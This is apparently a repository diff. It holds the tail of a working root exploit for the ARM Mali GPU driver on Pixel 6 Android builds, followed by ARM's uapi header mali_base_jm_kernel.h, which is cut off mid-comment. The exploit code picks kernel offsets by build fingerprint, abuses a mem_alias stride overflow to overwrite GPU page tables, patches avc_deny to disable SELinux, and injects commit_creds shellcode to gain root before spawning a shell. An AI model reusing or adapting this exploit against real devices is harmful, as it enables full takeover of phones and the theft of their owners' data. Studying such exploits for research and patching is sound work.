     384 + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
     385 + avc_deny = AVC_DENY_2201;
     386 + sel_read_enforce = SEL_READ_ENFORCE_2201;
     387 + fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
     388 + return;
     389 + }
     390 + if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
     391 + avc_deny = AVC_DENY_2202;
     392 + sel_read_enforce = SEL_READ_ENFORCE_2202;
     393 + fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
     394 + return;
     395 + }
      396 + errx(1, "unable to match build id");
     397 +}
     398 + 
      399 + //Clean up the page table: mark the overwritten pgd entries as invalid again (writing 2 marks a Mali pte as invalid)
     400 +void cleanup(int mali_fd, uint64_t gpu_va, uint64_t* reserved, size_t reserved_size) {
     401 + for (int i = 0; i < 2; i++) {
     402 + write_to(mali_fd, gpu_va + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
     403 + }
     404 +}
     405 + 
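//Overall flow (see the write-up linked in README.md): use the mem_alias stride
//overflow so that GPU addresses in gpu_va[1]'s range stay mapped to the pages
//backing gpu_va[0], groom the memory pools so those pages, once freed, are
//reused as level 3 page tables for the reserved regions, then write through
//gpu_va[1] to point page table entries at kernel code and patch avc_deny and
//sel_read_enforce.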
     406 +int run_exploit() {
     407 + int mali_fd = open_dev(MALI);
     408 + uint64_t gpu_va[3] = {0};
     409 + uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
     410 + 
     411 + setup_mali(mali_fd);
     412 + 
     413 + void* tracking_page = setup_tracking_page(mali_fd);
     414 + printf("tracking page %p\n", tracking_page);
     415 + 
     416 + //Allocate enough pages so the page free'd later will spill into the device pool
     417 + void* drain = drain_mem_pool(mali_fd);
     418 + printf("drain %p\n", drain);
     419 + 
     420 + //Regions for triggering the bug
     421 + for (int i = 0; i < 2; i++) {
     422 + void* region = map_gpu(mali_fd, 3, false, 1);
     423 + gpu_va[i] = (uint64_t)region;
     424 + }
     425 + 
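//Trigger the bug: with nents = 2 and stride = 2^63 + 1, nents * stride
//overflows to 2, so the alias is only accounted as a 2-page region while the
//GPU mappings created for the aliased entries spill beyond it, leaving
//gpu_va[1]'s addresses mapped to the pages backing gpu_va[0].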
     426 + union kbase_ioctl_mem_alias alias = {0};
     427 + alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
     428 + alias.in.stride = 9223372036854775808ull + 1;
     429 + 
     430 + alias.in.nents = 2;
     431 + struct base_mem_aliasing_info ai[2];
     432 + ai[0].handle.basep.handle = gpu_va[0];
     433 + ai[1].handle.basep.handle = gpu_va[0];
     434 + ai[0].length = 0x3;
     435 + ai[1].length = 0x3;
     436 + ai[0].offset = 0;
     437 + ai[1].offset = 0;
     438 + alias.in.aliasing_info = (uint64_t)(&(ai[0]));
     439 + mem_alias(mali_fd, &alias);
     440 + void* region = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
     441 + if (region == MAP_FAILED) {
     442 + err(1, "mmap failed");
     443 + }
     444 + 
      445 + //Allocate pages before we free the ones allocated in drain, so that these won't be allocated from the device pool
     446 + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
     447 + 
     448 + printf("gpu_va[0] %lx\n", gpu_va[0]);
     449 + printf("gpu_va[1] %lx\n", gpu_va[1]);
     450 + printf("alias %p\n", region);
     451 + munmap(region, 0x2000);
      452 + //Free the pages allocated in drain to fill up the context pool. With the context pool full, subsequent frees return pages to the device pool
     453 + release_mem_pool(drain);
     454 + 
      455 + //Free the doubly mapped pages; the freed pages return to the device pool, and we still hold GPU mappings to some of them through gpu_va[1]
     456 + munmap((void*)(gpu_va[0]), 0x3000);
     457 + 
      458 + //Map the pages reserved earlier. The size ensures that 2 new level 3 pgds are needed, which are allocated from the device pool (2 pages). One of
      459 + //these pgd pages is doubly mapped at gpu_va[1] + 0x1000
     460 + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
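//Build the value to write into the overwritten pgd entries: the page-aligned
//address of avc_deny (presumably its physical address, with KERNEL_BASE being
//the fixed physical kernel base) ORed with 0x443, which looks like the Mali
//ATE flag bits for a valid read/write level 3 entry.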
     461 + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
      462 + //Writing to gpu_va[1] now overwrites the level 3 pgds allocated for the reserved regions, pointing entry OVERWRITE_INDEX at the page containing avc_deny.
     463 + for (int i = 0; i < 2; i++) {
     464 + write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
     465 + }
     466 + 
     467 + usleep(100000);
      468 + //Go through the reserved page addresses to overwrite avc_deny with our own shellcode (the permissive payload)
     469 + write_func(mali_fd, avc_deny, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
     470 + 
      471 + //Trigger the overwritten avc_deny to disable SELinux (opening /dev/kmsg causes an SELinux check that runs our shellcode)
     472 + open("/dev/kmsg", O_RDONLY);
     473 + 
     474 + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
      475 + //Overwrite the same pgd entries again, this time pointing them at the page containing sel_read_enforce.
     476 + for (int i = 0; i < 2; i++) {
     477 + write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
     478 + }
     479 + 
      480 + //Overwrite sel_read_enforce with shellcode that calls commit_creds to gain root; the run_enforce() call below triggers it by reading the enforce file
     481 + write_func(mali_fd, sel_read_enforce, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
     482 + 
     483 + run_enforce();
     484 + 
     485 + cleanup(mali_fd, gpu_va[1], &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE);
     486 + usleep(100000);
     487 + 
     488 + return 0;
     489 +}
     490 + 
     491 +int main() {
     492 + setbuf(stdout, NULL);
     493 + setbuf(stderr, NULL);
     494 +
     495 + select_offset();
     496 + 
     497 + int ret = -1;
     498 + sleep(1);
     499 + ret = run_exploit();
     500 + if (!ret) system("sh");
     501 +}
     502 + 
  • ■ ■ ■ ■ ■ ■
    mali_base_jm_kernel.h
     1 +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
     2 +/*
     3 + *
     4 + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
     5 + *
     6 + * This program is free software and is provided to you under the terms of the
     7 + * GNU General Public License version 2 as published by the Free Software
     8 + * Foundation, and any use by you of this program is subject to the terms
     9 + * of such GNU license.
     10 + *
     11 + * This program is distributed in the hope that it will be useful,
     12 + * but WITHOUT ANY WARRANTY; without even the implied warranty of
     13 + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
     14 + * GNU General Public License for more details.
     15 + *
     16 + * You should have received a copy of the GNU General Public License
     17 + * along with this program; if not, you can access it online at
     18 + * http://www.gnu.org/licenses/gpl-2.0.html.
     19 + *
     20 + */
     21 + 
     22 +#ifndef _UAPI_BASE_JM_KERNEL_H_
     23 +#define _UAPI_BASE_JM_KERNEL_H_
     24 + 
     25 +#include <linux/types.h>
     26 + 
     27 +typedef __u32 base_mem_alloc_flags;
     28 +/* Memory allocation, access/hint flags.
     29 + *
     30 + * See base_mem_alloc_flags.
     31 + */
     32 + 
     33 +/* IN */
     34 +/* Read access CPU side
     35 + */
     36 +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
     37 + 
     38 +/* Write access CPU side
     39 + */
     40 +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
     41 + 
     42 +/* Read access GPU side
     43 + */
     44 +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
     45 + 
     46 +/* Write access GPU side
     47 + */
     48 +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
     49 + 
     50 +/* Execute allowed on the GPU side
     51 + */
     52 +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
     53 + 
     54 +/* Will be permanently mapped in kernel space.
     55 + * Flag is only allowed on allocations originating from kbase.
     56 + */
     57 +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
     58 + 
     59 +/* The allocation will completely reside within the same 4GB chunk in the GPU
     60 + * virtual space.
     61 + * Since this flag is primarily required only for the TLS memory which will
     62 + * not be used to contain executable code and also not used for Tiler heap,
     63 + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
     64 + */
     65 +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
     66 + 
     67 +/* Userspace is not allowed to free this memory.
     68 + * Flag is only allowed on allocations originating from kbase.
     69 + */
     70 +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
     71 + 
     72 +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
     73 + 
     74 +/* Grow backing store on GPU Page Fault
     75 + */
     76 +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
     77 + 
     78 +/* Page coherence Outer shareable, if available
     79 + */
     80 +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
     81 + 
     82 +/* Page coherence Inner shareable
     83 + */
     84 +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
     85 + 
     86 +/* IN/OUT */
     87 +/* Should be cached on the CPU, returned if actually cached
     88 + */
     89 +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
     90 + 
     91 +/* IN/OUT */
     92 +/* Must have same VA on both the GPU and the CPU
     93 + */
     94 +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
     95 + 
     96 +/* OUT */
     97 +/* Must call mmap to acquire a GPU address for the allocation
     98 + */
     99 +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
     100 + 
     101 +/* IN */
     102 +/* Page coherence Outer shareable, required.
     103 + */
     104 +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
     105 + 
     106 +/* Protected memory
     107 + */
     108 +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
     109 + 
     110 +/* Not needed physical memory
     111 + */
     112 +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
     113 + 
     114 +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
     115 + * addresses to be the same
     116 + */
     117 +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
     118 + 
     119 +/**
     120 + * Bit 19 is reserved.
     121 + *
     122 + * Do not remove, use the next unreserved bit for new flags
     123 + */
     124 +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
     125 + 
     126 +/**
     127 + * Memory starting from the end of the initial commit is aligned to 'extension'
     128 + * pages, where 'extension' must be a power of 2 and no more than
     129 + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
     130 + */
     131 +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
     132 + 
     133 +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
     134 + * mode. Some components within the GPU might only be able to access memory
     135 + * that is GPU cacheable. Refer to the specific GPU implementation for more
     136 + * details. The 3 shareability flags will be ignored for GPU uncached memory.
     137 + * If used while importing USER_BUFFER type memory, then the import will fail
     138 + * if the memory is not aligned to GPU and CPU cache line width.
     139 + */
     140 +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
     141 + 
     142 +/*
     143 + * Bits [22:25] for group_id (0~15).
     144 + *
     145 + * base_mem_group_id_set() should be used to pack a memory group ID into a
     146 + * base_mem_alloc_flags value instead of accessing the bits directly.
     147 + * base_mem_group_id_get() should be used to extract the memory group ID from
     148 + * a base_mem_alloc_flags value.
     149 + */
     150 +#define BASEP_MEM_GROUP_ID_SHIFT 22
     151 +#define BASE_MEM_GROUP_ID_MASK \
     152 + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
     153 + 
     154 +/* Must do CPU cache maintenance when imported memory is mapped/unmapped
     155 + * on GPU. Currently applicable to dma-buf type only.
     156 + */
     157 +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
     158 + 
     159 +/* Use the GPU VA chosen by the kernel client */
     160 +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
     161 + 
     162 +/* OUT */
     163 +/* Kernel side cache sync ops required */
     164 +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
     165 + 
     166 +/* Force trimming of JIT allocations when creating a new allocation */
     167 +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
     168 + 
     169 +/* Number of bits used as flags for base memory management
     170 + *
     171 + * Must be kept in sync with the base_mem_alloc_flags flags
     172 + */
     173 +#define BASE_MEM_FLAGS_NR_BITS 30
     174 + 
     175 +/* A mask of all the flags which are only valid for allocations within kbase,
     176 + * and may not be passed from user space.
     177 + */
     178 +#define BASEP_MEM_FLAGS_KERNEL_ONLY \
     179 + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
     180 + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
     181 + 
     182 +/* A mask for all output bits, excluding IN/OUT bits.
     183 + */
     184 +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
     185 + 
     186 +/* A mask for all input bits, including IN/OUT bits.
     187 + */
     188 +#define BASE_MEM_FLAGS_INPUT_MASK \
     189 + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
     190 + 
     191 +/* A mask of all currently reserved flags
     192 + */
     193 +#define BASE_MEM_FLAGS_RESERVED \
     194 + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
     195 + 
     196 +#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
     197 +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
     198 +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
     199 +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
     200 +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
     201 +/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */
     202 +#define BASE_MEM_COOKIE_BASE (64ul << 12)
     203 +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
     204 + BASE_MEM_COOKIE_BASE)
     205 + 
     206 +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
     207 + * initial commit is aligned to 'extension' pages, where 'extension' must be a power
     208 + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
     209 + */
     210 +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
     211 + 
     212 +/**
     213 + * If set, the heap info address points to a __u32 holding the used size in bytes;
     214 + * otherwise it points to a __u64 holding the lowest address of unused memory.
     215 + */
     216 +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
     217 + 
     218 +/**
     219 + * Valid set of just-in-time memory allocation flags
     220 + *
     221 + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
     222 + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
     223 + * and heap_info_gpu_addr being 0 will be rejected).
     224 + */
     225 +#define BASE_JIT_ALLOC_VALID_FLAGS \
     226 + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
     227 + 
     228 +/**
     229 + * typedef base_context_create_flags - Flags to pass to ::base_context_init.
     230 + *
     231 + * Flags can be ORed together to enable multiple things.
     232 + *
     233 + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
     234 + * not collide with them.
     235 + */
     236 +typedef __u32 base_context_create_flags;
     237 + 
     238 +/* No flags set */
     239 +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
     240 + 
     241 +/* Base context is embedded in a cctx object (flag used for CINSTR
     242 + * software counter macros)
     243 + */
     244 +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
     245 + 
     246 +/* Base context is a 'System Monitor' context for Hardware counters.
     247 + *
     248 + * One important side effect of this is that job submission is disabled.
     249 + */
     250 +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
     251 + ((base_context_create_flags)1 << 1)
     252 + 
     253 +/* Bit-shift used to encode a memory group ID in base_context_create_flags
     254 + */
     255 +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
     256 + 
     257 +/* Bitmask used to encode a memory group ID in base_context_create_flags
     258 + */
     259 +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
     260 + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
     261 + 
     262 +/* Bitpattern describing the base_context_create_flags that can be
     263 + * passed to the kernel
     264 + */
     265 +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
     266 + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
     267 + BASEP_CONTEXT_MMU_GROUP_ID_MASK)
     268 + 
     269 +/* Bitpattern describing the ::base_context_create_flags that can be
     270 + * passed to base_context_init()
     271 + */
     272 +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
     273 + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
     274 + 
     275 +/*
     276 + * Private flags used on the base context
     277 + *
     278 + * These start at bit 31, and run down to zero.
     279 + *
     280 + * They share the same space as base_context_create_flags, and so must
     281 + * not collide with them.
     282 + */
     283 + 
     284 +/* Private flag tracking whether job descriptor dumping is disabled */
     285 +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
     286 + ((base_context_create_flags)(1 << 31))
     287 + 
     288 +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
     289 + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
     290 + */
     291 +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
     292 + 
     293 +/* Indicate that job dumping is enabled. This could affect certain timers
     294 + * to account for the performance impact.
     295 + */
     296 +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
     297 + 
     298 +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
     299 + BASE_TLSTREAM_JOB_DUMPING_ENABLED)
     300 +/*
     301 + * Dependency stuff, keep it private for now. May want to expose it if
     302 + * we decide to make the number of semaphores a configurable
     303 + * option.
     304 + */
     305 +#define BASE_JD_ATOM_COUNT 256
     306 + 
     307 +/* Maximum number of concurrent render passes.
     308 + */
     309 +#define BASE_JD_RP_COUNT (256)
     310 + 
     311 +/* Set/reset values for a software event */
     312 +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
     313 +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
     314 + 
     315 +/**
     316 + * struct base_jd_udata - Per-job data
     317 + *
     318 + * This structure is used to store per-job data, and is completely unused
     319 + * by the Base driver. It can be used to store things such as callback
     320 + * function pointer, data to handle job completion. It is guaranteed to be
     321 + * untouched by the Base driver.
     322 + *
     323 + * @blob: per-job data array
     324 + */
     325 +struct base_jd_udata {
     326 + __u64 blob[2];
     327 +};
     328 + 
     329 +/**
     330 + * typedef base_jd_dep_type - Job dependency type.
     331 + *
     332 + * A flags field will be inserted into the atom structure to specify whether a
     333 + * dependency is a data or ordering dependency (by putting it before/after
     334 + * 'core_req' in the structure it should be possible to add without changing
     335 + * the structure size).
     336 + * When the flag is set for a particular dependency to signal that it is an
     337 + * ordering only dependency then errors will not be propagated.
     338 + */
     339 +typedef __u8 base_jd_dep_type;
     340 + 
     341 +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
     342 +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
     343 +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
     344 + 
     345 +/**
     346 + * typedef base_jd_core_req - Job chain hardware requirements.
     347 + *
     348 + * A job chain must specify what GPU features it needs to allow the
     349 + * driver to schedule the job correctly. By not specifying the
     350 + * correct settings can/will cause an early job termination. Multiple
     351 + * values can be ORed together to specify multiple requirements.
     352 + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
     353 + * dependencies, and that doesn't execute anything on the hardware.
     354 + */
     355 +typedef __u32 base_jd_core_req;
     356 + 
     357 +/* Requirements that come from the HW */
     358 + 
     359 +/* No requirement, dependency only
     360 + */
     361 +#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
     362 + 
     363 +/* Requires fragment shaders
     364 + */
     365 +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
     366 + 
     367 +/* Requires compute shaders
     368 + *
     369 + * This covers any of the following GPU job types:
     370 + * - Vertex Shader Job
     371 + * - Geometry Shader Job
     372 + * - An actual Compute Shader Job
     373 + *
     374 + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
     375 + * job is specifically just the "Compute Shader" job type, and not the "Vertex
     376 + * Shader" nor the "Geometry Shader" job type.
     377 + */
     378 +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
     379 + 
     380 +/* Requires tiling */
     381 +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
     382 + 
     383 +/* Requires cache flushes */
     384 +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
     385 + 
     386 +/* Requires value writeback */
     387 +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
     388 + 
     389 +/* SW-only requirements - the HW does not expose these as part of the job slot
     390 + * capabilities
     391 + */
     392 + 
     393 +/* Requires fragment job with AFBC encoding */
     394 +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
     395 + 
     396 +/* SW-only requirement: coalesce completion events.
     397 + * If this bit is set then completion of this atom will not cause an event to
     398 + * be sent to userspace, whether successful or not; completion events will be
     399 + * deferred until an atom completes which does not have this bit set.
     400 + *
     401 + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
     402 + */
     403 +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
     404 + 
     405 +/* SW Only requirement: the job chain requires a coherent core group. We don't
     406 + * mind which coherent core group is used.
     407 + */
     408 +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
     409 + 
     410 +/* SW Only requirement: The performance counters should be enabled only when
     411 + * they are needed, to reduce power consumption.
     412 + */
     413 +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
     414 + 
     415 +/* SW Only requirement: External resources are referenced by this atom.
     416 + *
     417 + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
     418 + * BASE_JD_REQ_SOFT_EVENT_WAIT.
     419 + */
     420 +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
     421 + 
     422 +/* SW Only requirement: Software defined job. Jobs with this bit set will not be
     423 + * submitted to the hardware but will cause some action to happen within the
     424 + * driver
     425 + */
     426 +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
     427 + 
     428 +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
     429 +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
     430 +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
     431 + 
     432 +/* 0x4 RESERVED for now */
     433 + 
     434 +/* SW only requirement: event wait/trigger job.
     435 + *
     436 + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
     437 + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
     438 + * other waiting jobs. It completes immediately.
     439 + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
     440 + * possible for other jobs to wait upon. It completes immediately.
     441 + */
     442 +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
     443 +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
     444 +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
     445 + 
     446 +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
     447 + 
     448 +/* SW only requirement: Just In Time allocation
     449 + *
     450 + * This job requests a single or multiple just-in-time allocations through a
     451 + * list of base_jit_alloc_info structure which is passed via the jc element of
     452 + * the atom. The number of base_jit_alloc_info structures present in the
     453 + * list is passed via the nr_extres element of the atom
     454 + *
     455 + * It should be noted that the id entry in base_jit_alloc_info must not
     456 + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
     457 + *
     458 + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
     459 + * soft job to free the JIT allocation is still made.
     460 + *
     461 + * The job will complete immediately.
     462 + */
     463 +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
     464 + 
     465 +/* SW only requirement: Just In Time free
     466 + *
     467 + * This job requests a single or multiple just-in-time allocations created by
     468 + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
     469 + * allocations is passed via the jc element of the atom.
     470 + *
     471 + * The job will complete immediately.
     472 + */
     473 +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
     474 + 
     475 +/* SW only requirement: Map external resource
     476 + *
     477 + * This job requests external resource(s) are mapped once the dependencies
     478 + * of the job have been satisfied. The list of external resources are
     479 + * passed via the jc element of the atom which is a pointer to a
     480 + * base_external_resource_list.
     481 + */
     482 +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
     483 + 
     484 +/* SW only requirement: Unmap external resource
     485 + *
     486 + * This job requests external resource(s) are unmapped once the dependencies
     487 + * of the job has been satisfied. The list of external resources are
     488 + * passed via the jc element of the atom which is a pointer to a
     489 + * base_external_resource_list.
     490 + */
     491 +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
     492 + 
     493 +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
     494 + *
     495 + * This indicates that the Job Chain contains GPU jobs of the 'Compute
     496 + * Shaders' type.
     497 + *
     498 + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
     499 + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
     500 + */
     501 +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
     502 + 
     503 +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
     504 + * particular core group
     505 + *
     506 + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
     507 + * takes priority
     508 + *
     509 + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
     510 + *
     511 + * If the core availability policy is keeping the required core group turned
     512 + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
     513 + */
     514 +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
     515 + 
     516 +/* SW Flag: If this bit is set then the successful completion of this atom
     517 + * will not cause an event to be sent to userspace
     518 + */
     519 +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
     520 + 
     521 +/* SW Flag: If this bit is set then completion of this atom will not cause an
     522 + * event to be sent to userspace, whether successful or not.
     523 + */
     524 +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
     525 + 
     526 +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
     527 + *
     528 + * If this bit is set then the GPU's cache will not be cleaned and invalidated
     529 + * until a GPU job starts which does not have this bit set or a job completes
     530 + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
